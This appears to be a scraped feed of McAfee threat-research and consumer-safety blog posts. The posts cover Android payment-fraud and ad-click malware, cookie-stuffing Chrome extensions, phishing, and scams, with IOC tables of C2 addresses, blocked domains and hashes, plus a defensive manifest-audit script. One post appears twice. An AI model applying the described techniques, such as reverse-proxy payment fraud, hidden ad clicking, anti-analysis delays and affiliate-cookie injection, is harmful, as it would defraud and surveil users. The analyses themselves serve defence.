com.rocketboosterapps.toonifyme | 3f45a38b103e1812146df8ce179182f54c4a0191e19560fcbd77240cbc39886b | 10K | Fleeceware |
com.nhatanhstudio.cartoon.photoeffect | 2c7f4fc403d1449b70218624d8a409497bf4694493c7f4c06cd8ccecff21799a | 5K | Repackaged Adware |
com.cambe.PhotoCartoon | 5327f415d0e9b21523f64403ec231e1fd0279c48b41f023160cd1d70dd733dbf | 10K | Repackaged Adware |
com.chiroh.cartoon.prismaeffect | 18fef9f92639e31dd6566854feb30e1e4333b971b05ae9aba93ac0aa395c955b | 1K | Repackaged Adware |
cartoon.photo.effect.editor.cartoon.maker.online.caricature.appanime.convert.photo.intocartoon | 3b941b7005572760b95239d73b8a8bbfdb81d26d405941171328daa8f3c01183 | 50 | Repackaged Adware |
com.waxwell.saunders.pistaphotoeditor | 489d4aaec3bc694ddd124ab8b4f0b7621a51aad13598fd39cd5c3d2067b950e5 | 50 | FaceStealer |
com.ashtoon.tooncool.skordoi | 980c090c01bef890ef74bd93e181d67a5c6cd1b091573eaaf2e1988756aacd50 | 100K | FaceStealer |
com.faceart.savetoon.cartoonedit | 55ffc2e392280e8967de0857b02946094268588209963c6146dad01ae537daca | 100 | FaceStealer |
com.okenyo.creatkartoon.studio | e696d7304e5f56d7125dd54c853ff35a394a4175fcaf7785d332404e161d6deb | 500K | FaceStealer |
com.onlansuyanto.editor.bading | 59f9630c2ebe4896f585ec7722c43bb54c926e3e915dcfa4ff807bea444dc07b | 10K | FaceStealer |
com.madtoon.aicartoon.kiroah | c29adfade300dde5e9c31b23d35a6792ed4a7ad8394d37b69b5cecc931a7ad9f | 100K | FaceStealer |
com.acetoon.studio.facephoto | 24cf7fcaefe98bc9db34f551d11906d3f1349a5b60adf5fa37f15a872b61ee95 | 100K | FaceStealer |
com.funcolornext.beautyfungoodcolor | b2cfa8b2eccecdcb06293512df0db463850704383f920e5782ee6c5347edc6f5 | 100K | Repackaged Adware |
The post The Rise and Risks of AI Art Apps appeared first on McAfee Blog.
Authored by SangRyol Ryu and Yukihiro Okutomi
McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in Japan. The malware, which was distributed on the Google Play store, pretends to be a legitimate mobile security app, but it is in fact payment fraud malware that steals passwords and abuses a reverse proxy targeting mobile payment services. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security’, with package names ‘com.z.cloud.px.app’ and ‘com.z.px.appx’. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy.
The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software.
An SMS message from France (from a Twitter post by Yusuke)
Malware on Google Play
The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive.
Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post.
When a user installs and launches this malware, it asks for the Service password. Cleverly, the malware shows an incorrect-password message in order to collect more accurate passwords. Of course, it does not matter to the app whether the password is correct or not; it is simply a way of harvesting the Service password. The Service password is used for a payment service that provides easy online payments. The user can start this payment service by setting a Service password, and the charges are added to the mobile phone bill.
A native library named ‘libmyapp.so’, written in Golang, is loaded during app execution. When loaded, the library tries to connect to the C2 server using a WebSocket. The Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). Once the connection is made, the malware sends out network information along with the phone number. Then it registers the client procedure commands described in the table below. The WebSocket connection is kept alive and, like an agent, the malware takes the corresponding action when a command is received from the server. The same socket is used to send the Service password to the attacker when the user enters it on the activity.
RPC Function name | Description |
connect_to | Create reverse proxy and connect to remote server |
disconnect | Disconnect the reverse proxy |
get_status | Send the reverse proxy status |
get_info | Send line number, connection type, operator, and so on |
toggle_wifi | Set the Wi-Fi ON/OFF |
show_battery_opt | Show dialog to exclude battery optimization for background work |
Registered RPC functions description
To make a fraudulent purchase with the leaked information, the attacker needs to use the user’s network. The RPC command ‘toggle_wifi’ can switch the connection between Wi-Fi and the cellular network, and ‘connect_to’ provides a reverse proxy to the attacker. A reverse proxy allows connecting to a host behind NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests through the user’s network.
It is an interesting point that the malware uses a reverse proxy to abuse the user’s network and implements an agent service with WAMP. The McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications.
193[.]239[.]154[.]23
91[.]204[.]227[.]132
ruboq[.]com
SHA256 | Package Name | Distribution |
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd | com.z.cloud.px.app | Google Play |
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0 | com.z.cloud.px.app | Other |
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02 | com.z.px.appx | Google Play |
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad | com.z.cloud.px.app2 | Other |
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4 | com.jg.rc.papp | Google Drive |
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956 | com.de.rc.seee | Google Drive |
The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.
Authored by Oliver Devane
It hasn’t taken malicious actors long to take advantage of the recent bankruptcy filing of FTX: McAfee has discovered several phishing sites targeting FTX users.
One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and would likely transfer all the funds out of it.
Upon analyzing the website code used to create the phishing sites, we noticed that they were extremely similar to previous sites targeting WalletConnect customers, so it appears that they likely just modified a previous phishing kit to target FTX users.
The image below shows a code comparison with a website from June 2022; the FTX phishing site shares most of its code with it.
McAfee urges anyone who was using FTX to be wary of any unsolicited emails or social media messages they receive and to double-check their authenticity before acting on them. If you are unsure of the signs to look for, please check out the McAfee Scam education portal (https://www.mcafee.com/consumer/en-us/landing-page/retention/scammer-education.html).
McAfee customers are protected against the sites mentioned in this blog.
Type | Value | Product | Detected |
URL | ftx-users-refund[.]com | McAfee WebAdvisor | Blocked |
URL | ftx-refund[.]com | McAfee WebAdvisor | Blocked |
The post Threat Actors Taking Advantage of FTX Bankruptcy appeared first on McAfee Blog.
Following up on our previous blog, How to Stop the Popups, McAfee Labs saw a sharp decrease in the number of deceptive push notifications reported by McAfee consumers running Microsoft’s Edge browser on Windows.
Such browser-delivered push messages appear as toaster pop-ups in the tray above the system clock and are meant to trick users into taking various actions, such as installing software, purchasing a subscription, or providing personal information.
Upon further investigation, this major drop seems to be associated with a change in the behavior of the Edge browser with two notable improvements over older versions.
First, when users visit websites known to deliver deceptive push notifications, Edge blocks authorization prompts that could trick users into opting-in to receive popups:
Second, when unwanted popups do occur, it is now easier than ever to disable them, on a per-site basis. Users can simply click the three dots (…) on the right of the notification and choose to “Turn off all notifications for” the domain responsible for the popup.
This is a great improvement over the previous experience of having to manually navigate browser settings to achieve the desired result.
Earlier this year, 9TO5Google reported that a Chrome code change may be indicative of a similar crackdown by Google on nefarious popups.
One can hope Google will follow Microsoft’s example to improve browser security and usability.
The post Microsoft’s Edge over Popups (and Google Chrome) appeared first on McAfee Blog.
Authored by: Christy Crimmins and Oliver Devane
Football (or Soccer as we call it in the U.S.) is the most popular sport in the world, with over 3.5 billion fans across the globe. On November 20th, the men’s World Cup kicks off (pun intended) in Qatar. This event, a tournament played by 32 national teams every four years, determines the sport’s world champion. It will also be one of the most-watched sporting events of at least the last four years (since the previous World Cup).
An event with this level of popularity and interest also attracts fraudsters and cyber criminals looking to capitalize on fans’ excitement. Here’s how to spot these scams and stay penalty-free during this year’s tournament.
Phishing is a tool that cybercriminals have used for years now. Most of us are familiar with the telltale signs—misspelled words, poor grammar, and a sender whose email address makes no sense or whose phone number is unknown. But excitement and anticipation can cloud our judgment. What football fan wouldn’t be tempted to win a free trip to see their home team participate in the ultimate tournament? Cybercriminals are betting that this excitement will cloud fans’ judgment, leading them to click on nefarious links that ultimately download malware or steal personal information.
It’s important to realize that these messages can come via a variety of channels, including email, text messages (also known as smishing), and other messaging channels like WhatsApp and Telegram. No matter what the source is, it’s essential to remain vigilant and pause to think before clicking links or giving out personal or banking information.
For more information on phishing and how to spot a phisher, see McAfee’s “What is Phishing?” blog.
According to ActionFraud, the UK’s national reporting center for fraud and cybercrime, thousands of people were victims of ticket fraud in 2019—and that’s just in the UK. Ticket fraud is when someone advertises tickets for sale, usually through a website or message board, collects the payment and then disappears, without the buyer ever receiving the ticket.
The World Cup is a prime (and lucrative) target for this type of scam, with fans willing to pay thousands of dollars to see their teams compete. Chances are most people have their tickets firmly in hand (or digital wallet) by now, but if you’re planning to try a last-minute trip, beware of this scam and make sure that you’re using a legitimate, reputable ticket broker. To be perfectly safe, stick with well-known ticket brokers and those who offer consumer protection. Also beware of sites that don’t accept debit or credit cards and only accept payment in the form of bitcoin or wire transfers such as the one on the fake ticket site below:
The red box on the right image shows that the ticket site accepts payment via Bitcoin.
Other red flags to look out for are websites that ask you to contact them to make payment and the only contact information is via WhatsApp.
Let’s be realistic—most of us are going to have to settle for watching the World Cup from the comfort of our own home, or the pub down the street. If you’re watching the tournament online, be sure that you’re using a legitimate streaming service. A quick Google of “FIFA World Cup 2022 Official Streaming” along with your country should get you the information you need to safely watch the event through official channels. The FIFA site itself is also a good source of information.
Illegal streaming sites usually contain deceptive ads and malware which can cause harm to your device.
In countries or regions where sports betting is legal, the 2022 World Cup is expected to drive an increase in activity. There’s no shortage of things to bet on, from a simple win/loss to the exact minute a goal will be scored by a particular player. Everything is subject to wager.
As with our previous examples, this increase in legitimate gambling brings with it an increase in deceptive activity. Online betting scams often start when users are directed to, or search for, a gambling site and end up on a fraudulent one. After placing their bets and winning, users realize that while they may have “won” money, they are unable to withdraw it, and are sometimes even asked to deposit more money to make their winnings available; even then, the winnings never arrive. By the end of this process, the bettor has lost all of their initial money (and potentially more), as well as any personal information they shared on the site.
As with other scams, users should be wary of sites that look hastily put together or are riddled with errors. Your best bet (yes, again, pun intended) is to look for an established online service that is approved by your government or region’s gaming commission. Finally, reading the fine print on incentives or bonuses is always a good idea. If something sounds too good to be true, it’s best to double-check.
For more on how you can bet online safely, and for details on how legalized online betting works in the U.S., check out our blog on the topic.
Using a free public Wi-Fi connection is risky. User data on these networks is unprotected, which makes it vulnerable to cyber criminals. Whether you’re traveling to Qatar for a match or watching them with friends at your favorite pub, if you’re connecting to a public Wi-Fi connection, make sure you use a trusted VPN connection.
For more information on scams, visit our scam education page. Hopefully, with these tips, you’ll be able to enjoy and participate in some of the World Cup festivities. After all, fun is the goal!
The post Don’t Get Caught Offsides with These World Cup Scams appeared first on McAfee Blog.
Authored by SangRyol Ryu
Cybercriminals are always after illegal advertising revenue. As we have previously reported, we have seen many mobile malware samples masquerading as useful tools or utilities while automatically crawling ads in the background. Recently, the McAfee Mobile Research Team identified new Clicker malware that sneaked into Google Play. In total, 16 applications that were previously on Google Play have been confirmed to carry the malicious payload, with an estimated 20 million installations.
McAfee security researchers notified Google, and all of the identified apps are no longer available on Google Play. Users are also protected by Google Play Protect, which blocks these apps on Android. McAfee Mobile Security products detect this threat as Android/Clicker and protect you from the malware. For more information and to get fully protected, visit McAfee Mobile Security.
The malicious code was found in useful utility applications like Flashlight (Torch), QR readers, Camera, Unit converters, and Task managers:
Once the application is opened, it downloads its remote configuration by making an HTTP request. After the configuration is downloaded, it registers an FCM (Firebase Cloud Messaging) listener to receive push messages. At first glance, it looks like well-made Android software. Behind that, however, it hides ad-fraud features driven by remote configuration and FCM messages.
Attribute name | Known meaning of the value |
FCMDelay | Initial start delay, in hours, after first installation |
adButton | Visibility of an advertisement button |
adMob | AdMob unit ID |
adMobBanner | AdMob unit ID |
casOn | Whether the CAS library is enabled |
facebookAd | Facebook Ad ID |
fbAdRatio | Ratio of Facebook ads |
googleAdRatio | Ratio of AdMob ads |
is | Decides whether BootService runs |
urlOpen | Whether to open a popup when PowerService starts |
popUrl | URL for PowerService |
popUpDelay | Delay time for PowerService |
liveUrl | URL for the live-check service |
pbeKey | Key for making a unique string |
playButtonList | URL for other services |
reviewPopupDialog | ‘y’ shows the review dialog |
tickDelay | Delay time for TickService |
tickEnable | Whether TickService is enabled |
tickRandomMax | Maximum random delay for TickService |
tickRandomMin | Minimum random delay for TickService |
tickType | Sets the type of TickService |
updateNotiVersion | Value for showing the update activity |
The FCM message carries various types of information, including which function to call and its parameters. The picture below shows some of the FCM message history:
When an FCM message is received and certain conditions are met, the latent function starts working. Mainly, it visits the websites delivered in the FCM message and browses them successively in the background while mimicking user behavior. This may generate heavy network traffic and drain the battery without the user’s awareness, all while generating profit for the threat actor behind this malware. The picture below shows an example of the network traffic generated to fetch the information required to produce fake clicks, and of the websites visited without the user’s consent or interaction:
So far, we have identified two pieces of code related to this threat. One is “com.click.cas” library which focuses on the automated clicking functionality while “com.liveposting” library works as an agent and runs hidden adware services:
Depending on the version of the application, some have both libraries working together while others only have the “com.liveposting” library. The malware uses installation time, random delays, and user presence to keep users from noticing its malicious activity. The malicious behavior won’t start within the first hour after installation or while the user is actively using the device, probably to stay under the radar and avoid being detected right away:
Clicker malware targets illicit advertising revenue and can disrupt the mobile advertising ecosystem. Malicious behavior is cleverly hidden from detection. Malicious actions such as retrieving crawl URL information via FCM messages start in the background after a certain period of time and are not visible to the user.
McAfee Mobile Security detects and removes malicious applications like this one that may run in the background without the user’s knowledge. We also recommend having security software installed and activated so that you are notified of any mobile threats on your device in a timely manner. Once you remove this and other malicious applications, you can expect longer battery life and reduced mobile data usage, while ensuring that your sensitive and personal data is protected from this and other types of threats.
SHA256 | Package name | Name | Downloaded |
a84d51b9d7ae675c38e260b293498db071b1dfb08400b4f65ae51bcda94b253e | com.hantor.CozyCamera | High-Speed Camera | 10,000,000+ |
00c0164d787db2ad6ff4eeebbc0752fcd773e7bf016ea74886da3eeceaefcf76 | com.james.SmartTaskManager | Smart Task Manager | 5,000,000+ |
b675404c7e835febe7c6c703b238fb23d67e9bd0df1af0d6d2ff5ddf35923fb3 | kr.caramel.flash_plus | Flashlight+ | 1,000,000+ |
65794d45aa5c486029593a2d12580746582b47f0725f2f002f0f9c4fd1faf92c | com.smh.memocalendar | 달력메모장 | 1,000,000+ |
82723816760f762b18179f3c500c70f210bbad712b0a6dfbfba8d0d77753db8d | com.joysoft.wordBook | K-Dictionary | 1,000,000+ |
b252f742b8b7ba2fa7a7aa78206271747bcf046817a553e82bd999dc580beabb | com.kmshack.BusanBus | BusanBus | 1,000,000+ |
a2447364d1338b73a6272ba8028e2524a8f54897ad5495521e4fab9c0fd4df6d | com.candlencom.candleprotest | Flashlight+ | 500,000+ |
a3f484c7aad0c49e50f52d24d3456298e01cd51595c693e0545a7c6c42e460a6 | com.movinapp.quicknote | Quick Note | 500,000+ |
a8a744c6aa9443bd5e00f81a504efad3b76841bbb33c40933c2d72423d5da19c | com.smartwho.SmartCurrencyConverter | Currency Converter | 500,000+ |
809752e24aa08f74fce52368c05b082fe2198a291b4c765669b2266105a33c94 | com.joysoft.barcode | Joycode | 100,000+ |
262ad45c077902d603d88d3f6a44fced9905df501e529adc8f57a1358b454040 | com.joysoft.ezdica | EzDica | 100,000+ |
1caf0f6ca01dd36ba44c9e53879238cb46ebb525cb91f7e6c34275c4490b86d7 | com.schedulezero.instapp | Instagram Profile Downloader | 100,000+ |
78351c605cfd02e1e5066834755d5a57505ce69ca7d5a1995db5f7d5e47c9da1 | com.meek.tingboard | Ez Notes | 100,000+ |
4dd39479dd98124fd126d5abac9d0a751bd942b541b4df40cb70088c3f3d49f8 | com.candlencom.flashlite | 손전등 | 1,000+ |
309db11c2977988a1961f8a8dbfc892cf668d7a4c2b52d45d77862adbb1fd3eb | com.doubleline.calcul | 계산기 | 100+ |
bf1d8ce2deda2e598ee808ded71c3b804704ab6262ab8e2f2e20e6c89c1b3143 | com.dev.imagevault | Flashlight+ | 100+ |
The post New Malicious Clicker found in apps installed by 20M+ users appeared first on McAfee Blog.
Authored by SangRyol Ryu and Yukihiro Okutomi
McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in Japan. The malware, which was distributed on the Google Play store, pretends to be a legitimate mobile security app, but it is in fact payment-fraud malware that steals passwords and abuses a reverse proxy to target mobile payment services. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security’, package names ‘com.z.cloud.px.app’ and ‘com.z.px.appx’. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy.
The malware actor continues to publish malicious apps on the Google Play Store from various developer accounts. According to information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas containing a Google Play link to lure users into installing the malware. To attract more users, the message urges them to update their security software.
An SMS message from France (from a Twitter post by Yusuke Osumi)
Malware on Google Play
The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. Compared with downloading an APK file and then installing it, Google Drive lets users install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, only a few more touches are required to run the application. Three clicks are enough if the user has previously allowed the installation of unknown apps from Google Drive.
Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post.
When a user installs and launches this malware, it asks for the Service password. Cleverly, the malware shows incorrect-password messages to collect more accurate passwords; whether the entered password is actually correct does not matter, since the goal is simply to obtain it. The Service password is used for the payment service, which provides easy online payments. The user can start this payment service by setting a Service password, and the charge is paid along with the mobile phone bill.
The Network password is used for the NTT DOCOMO payment service which provides easy online payments. NTT DOCOMO mobile network users can start this payment service by just setting 4-digits password called a Network password. The charge will be paid along with the mobile phone bill. When you need to pay online, you can simply do the payment process by entering the 4-digits password.
After the password activity, the malware shows a fake mobile security screen. Interestingly, the layout of the activity is similar to our old McAfee Mobile Security. All buttons look genuine, but these are all fake.
A native library named ‘libmyapp.so’, written in Go, is loaded during app execution. When loaded, it tries to connect to the C2 server over a WebSocket, using the Web Application Messaging Protocol (WAMP) to communicate and process Remote Procedure Calls (RPC). Once the connection is made, the malware sends out network information along with the phone number and then registers the client-side procedures described in the table below. The WebSocket connection is kept alive, and the malware acts like an agent, taking the corresponding action whenever a command is received from the server. The same socket is used to send the Service password to the attacker when the user enters it on the activity.
RPC Function name | Description |
connect_to | Create reverse proxy and connect to remote server |
disconnect | Disconnect the reverse proxy |
get_status | Send the reverse proxy status |
get_info | Send line number, connection type, operator, and so on |
toggle_wifi | Set the Wi-Fi ON/OFF |
show_battery_opt | Show dialog to exclude battery optimization for background work |
Registered RPC functions description
To make a fraudulent purchase with the leaked information, the attacker needs to use the user’s network. The RPC command ‘toggle_wifi’ can switch the connection between Wi-Fi and the cellular network, and ‘connect_to’ provides a reverse proxy to the attacker. A reverse proxy allows a connection to be made to a host behind NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests through the user’s network.
It is interesting that the malware uses a reverse proxy to hijack the user’s network connection and implements an agent service with WAMP. The McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. We recommend being more careful when entering a password or confidential information into untrusted applications.
193[.]239[.]154[.]23
91[.]204[.]227[.]132
ruboq[.]com
SHA256 | Package Name | Distribution |
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd | com.z.cloud.px.app | Google Play |
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0 | com.z.cloud.px.app | Other |
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02 | com.z.px.appx | Google Play |
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad | com.z.cloud.px.app2 | Other |
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4 | com.jg.rc.papp | Google Drive |
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956 | com.de.rc.seee | Google Drive |
The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.
Authored by Oliver Devane and Vallabh Chole
September 9, 2022 Update: Since the original publication of this blog on August 29, 2022, the Flipshope browser extension was updated in the Chrome Store on September 6, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.
September 30, 2022 Update: Since the original publication of this blog on August 29, 2022, the AutoBuy browser extension was updated in the Chrome Store on September 17, 2022 with a version that no longer contains the potentially harmful features originally discussed in this blog.
A few months ago, we blogged about malicious extensions redirecting users to phishing sites and inserting affiliate IDs into cookies of eCommerce sites. Since that time, we have investigated several other malicious extensions and discovered 5 extensions with a total install base of over 1,400,000.
The extensions offer various functions, such as enabling users to watch Netflix shows together, providing website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage.
Apart from offering the intended functionality, the extensions also track the user’s browsing activity. Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased.
The users of the extensions are unaware of this functionality and the privacy risk of every site being visited being sent to the servers of the extension authors.
The 5 extensions are:
Name | Extension ID | Users |
Netflix Party | mmnbenehknklpbendgmgngeaignppnbe | 800,000 |
Netflix Party 2 | flijfnhifgdcbhglkneplegafminjnhn | 300,000 |
FlipShope – Price Tracker Extension | adikhbfjdbjkhelbdnffogkobkekkkej | 80,000 |
Full Page Screenshot Capture – Screenshotting | pojgkmkfincpdkdgjepkmdekcahmckjp | 200,000 |
AutoBuy Flash Sales | gbnahglfafmhaehbdmjedfhdmimjcbed | 20,000 |
This section contains the technical analysis of the malicious Chrome extension ‘mmnbenehknklpbendgmgngeaignppnbe’. All 5 extensions exhibit similar behavior.
The manifest.json sets the background page as bg.html. This HTML file loads b0.js and this is responsible for sending the URL being visited and injecting code into the eCommerce sites.
The b0.js script contains many functions. This blog will focus on the functions which are responsible for sending the visited URLs to the server and processing the response.
Chrome extensions work by subscribing to events which they then use as triggers to perform a certain activity. The extensions analyzed subscribe to events coming from chrome.tabs.onUpdated. chrome.tabs.onUpdated will trigger when a user navigates to a new URL within a tab.
Once this event triggers, the extension will set a variable called curl with the URL of the tab by using the tab.url variable. It creates several other variables which are then sent to d.langhort.com. The POST data is in the following format:
Variable | Description |
Ref | Base64 encoded referral URL |
County | The country of the device |
City | The city of the device |
Zip | The zip code of the device |
Apisend | A random ID generated for the user. |
Name | Base64 encoded URL being visited |
ext_name | The name of the chrome extensions |
The random ID is created by selecting 8 random characters in a character set. The code is shown below:
The country, city, and zip are gathered using ip-api.com. The code is shown below:
Upon receiving the URL, langhort.com checks whether it matches a list of websites for which it has an affiliate ID, and if it does, it responds to the query. An example of this is shown below:
The data returned is in JSON format. The response is checked using the function below and will invoke further functions depending on what the response contains.
Two of the functions are detailed below:
If the result is ‘c’, as in the example shown in this blog, the extension queries the returned URL. It then checks the response, and if the status is 200 or 404, it checks whether the query responded with a URL. If it did, it inserts the URL received from the server as an iframe on the website being visited.
If the result is ‘e’, the extension would insert the result as a cookie. We were unable to find a response of ‘e’ during our analysis, but this would enable the authors to add any cookie to any website as the extensions had the correct ‘cookie’ permissions.
The images below show the step-by-step flow of events while navigating to the BestBuy website.
Here is a video of the events
We discovered an interesting trick in a few of the extensions that would prevent the malicious activity from being identified in automated analysis environments. They contained a time check before performing any malicious activity, implemented by checking whether the current date is more than 15 days after the time of installation.
This blog highlights the risk of installing extensions, even those that have a large install base as they can still contain malicious code.
McAfee advises its customers to be cautious when installing Chrome extensions and pay attention to the permissions that they are requesting.
The permissions will be shown by Chrome before the installation of the extension. Customers should take extra steps to verify the authenticity of an extension if it is requesting permissions that enable it to run on every website you visit, such as the one detailed in this blog.
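One way to apply that advice before loading an extension is to audit its manifest.json for the permission pattern this post describes: access to every site plus the tabs and cookies APIs, which is all that cookie stuffing needs. The script below is an added example (not code from the extensions or from McAfee); the sample manifests are constructed to mirror the described layout (a background page bg.html, tabs and cookies permissions, access to all URLs), and the permission lists and risk levels are this example's own judgement calls.

```python
import json

# Host patterns that grant access to every site the user visits.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions worth a second look, with the capability each grants.
SENSITIVE_PERMISSIONS = {
    "cookies": "read/write cookies on any site it has host access to",
    "tabs": "see the URL of every tab the user navigates to",
    "webRequest": "observe every network request",
    "webNavigation": "observe every navigation event",
    "scripting": "inject scripts into pages",
}


def host_patterns(manifest: dict) -> set:
    """Collect host match patterns from MV2 'permissions', MV3 'host_permissions'
    and any content_scripts 'matches' lists."""
    patterns = set()
    for key in ("permissions", "host_permissions"):
        for entry in manifest.get(key, []):
            if entry == "<all_urls>" or "://" in entry:
                patterns.add(entry)
    for cs in manifest.get("content_scripts", []):
        patterns.update(cs.get("matches", []))
    return patterns


def audit_manifest(manifest: dict) -> dict:
    """Return {'risk': 'low'|'medium'|'high', 'findings': [...]} for one manifest."""
    findings = []
    broad = host_patterns(manifest) & BROAD_HOST_PATTERNS
    if broad:
        findings.append("runs on every website: " + ", ".join(sorted(broad)))

    perms = set(manifest.get("permissions", []))
    for p in sorted(perms & set(SENSITIVE_PERMISSIONS)):
        findings.append(f"permission '{p}' can {SENSITIVE_PERMISSIONS[p]}")

    risk = "medium" if findings else "low"
    # The combination this post describes: every visited URL is observable
    # (tabs + all-site access) and cookies can be written (cookies).
    if broad and "cookies" in perms and "tabs" in perms:
        findings.append("HIGH: all-site access + 'tabs' + 'cookies' matches the cookie-stuffing pattern")
        risk = "high"
    return {"risk": risk, "findings": findings}


def audit_manifest_json(text: str) -> dict:
    """Convenience wrapper for a raw manifest.json string."""
    return audit_manifest(json.loads(text))


# Constructed sample manifest (not the real extension's) shaped like the one
# described in this post: background page bg.html, tab tracking, cookie
# access and host access to every site.
SAMPLE_MANIFEST = """{
  "manifest_version": 2,
  "name": "Watch Together (constructed sample)",
  "version": "1.0",
  "background": {"page": "bg.html", "persistent": true},
  "permissions": ["tabs", "cookies", "storage", "<all_urls>"]
}"""

# Constructed benign manifest for comparison.
BENIGN_MANIFEST = """{
  "manifest_version": 3,
  "name": "Notes (constructed sample)",
  "version": "1.0",
  "permissions": ["storage"]
}"""

if __name__ == "__main__":
    for text in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        report = audit_manifest_json(text)
        print(json.loads(text)["name"], "->", report["risk"])
        for finding in report["findings"]:
            print("  -", finding)
```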
McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.
The malicious code within the extension is detected as JTI/Suspect. Please perform a ‘Full’ scan via the product.
Type | Value | Product | Detected |
Chrome Extension | Netflix Party – mmnbenehknklpbendgmgngeaignppnbe | Total Protection and LiveSafe | JTI/Suspect |
Chrome Extension | FlipShope – Price Tracker Extension – Version 3.0.7.0 – adikhbfjdbjkhelbdnffogkobkekkkej | Total Protection and LiveSafe | JTI/Suspect |
Chrome Extension | Full Page Screenshot Capture – pojgkmkfincpdkdgjepkmdekcahmckjp | Total Protection and LiveSafe | JTI/Suspect |
Chrome Extension | Netflix Party 2 – flijfnhifgdcbhglkneplegafminjnhn | Total Protection and LiveSafe | JTI/Suspect |
Chrome Extension | AutoBuy Flash Sales – gbnahglfafmhaehbdmjedfhdmimjcbed | Total Protection and LiveSafe | JTI/Suspect |
URL | www.netflixparty1.com | McAfee WebAdvisor | Blocked |
URL | netflixpartyplus.com | McAfee WebAdvisor | Blocked |
URL | goscreenshotting.com | McAfee WebAdvisor | Blocked |
URL | langhort.com | McAfee WebAdvisor | Blocked |
URL | Unscart.in | McAfee WebAdvisor | Blocked |
URL | autobuyapp.com | McAfee WebAdvisor | Blocked |
The post Malicious Cookie Stuffing Chrome Extensions with 1.4 Million Users appeared first on McAfee Blog.
Authored by Oliver Devane
Technical Support Scams have been targeting computer users for many years. Their goal is to make victims believe they have issues needing to be fixed, and then charge exorbitant fees, which unfortunately some victims pay. This blog post covers a number of example actions that scammers go through when performing their scams. Our goal is to educate consumers on the signs to look out for, and what to do if they believe they are being scammed.
For a tech support scammer to reach their victims, they need to first find them (or be found by them). One technique we see includes scammers creating Twitter or other social media accounts that post messages claiming to be from the official technical support site. For example, a Twitter account will post a tweet with the hashtags #McAfee and #McAfeeLogin to drive traffic to the tweet and make victims believe the links are legitimate and safe to click.
Scammers behind tech support scams can create very convincing websites which mimic the official ones.
Some fraudulent websites use the McAfee logo or other company logos to try to trick individuals. They often invite clicking on a ‘LOGIN’ or ‘ACTIVATE’ link with a similar color scheme to the official sites to appear legitimate.
These sites may then ask the victim to enter their real username, password, and phone number. Upon entering these details, websites will usually show an error message to make the victim believe there is an issue with their account.
The error message will usually contain a link that upon clicking will load a chat box where the scammers will initiate a conversation with the victim. At this point, the scammers will have the phone number and email address associated with the victim. They will use this to contact them and make them believe they are an official technical support employee.
The scammer’s next objective is often to gain access to the victim’s computer. They do this so that they can trick the victim into believing there is an issue with their computer and that they need their support services to fix it.
The scammers will do this by either asking the victim to enter a URL that will result in the download of a remote access tool or by providing them with a link in the chat window if they are still speaking to them on the fake support website.
A remote access tool will enable the scammer to take complete control of the victim’s machine. With this, they will be able to remove or install software, access personal data such as documents and cryptocurrency wallets as well as dump passwords from the web browsers so they can then access all the victim’s accounts.
